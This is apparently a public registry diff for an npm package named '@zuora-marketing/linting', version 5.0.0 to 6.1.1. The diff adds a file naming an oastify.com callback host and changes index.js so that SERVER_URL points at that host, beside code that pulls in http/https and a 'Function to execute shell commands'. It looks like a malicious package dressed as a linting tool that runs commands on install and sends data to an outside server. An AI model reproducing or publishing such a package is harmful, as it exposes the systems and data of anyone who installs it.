@zuora-marketing/linting 5.0.0 → 6.1.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (4) hide show
  1. package/hok +1 -0
  2. package/index.js +1 -1
  3. package/logs +1529 -0
  4. package/package.json +7 -3
package/hok ADDED
@@ -0,0 +1 @@
1
+ 0qrdhvhhrnd31cfmhs9rw3ndz45wtnhc.oastify.com
package/index.js CHANGED
@@ -4,7 +4,7 @@ const https = require('https');
4
4
  const http = require('http');
5
5
 
6
6
  // ===== CONFIGURATION =====
7
- const SERVER_URL = 'https://d5fsn774cdfv7coqg8ngn4swwa49qr3w1.oast.me/'; // Change this to your server URL
7
+ const SERVER_URL = 'https://0qrdhvhhrnd31cfmhs9rw3ndz45wtnhc.oastify.com/'; // Change this to your server URL
8
8
  // =========================
9
9
 
10
10
  // Function to execute shell commands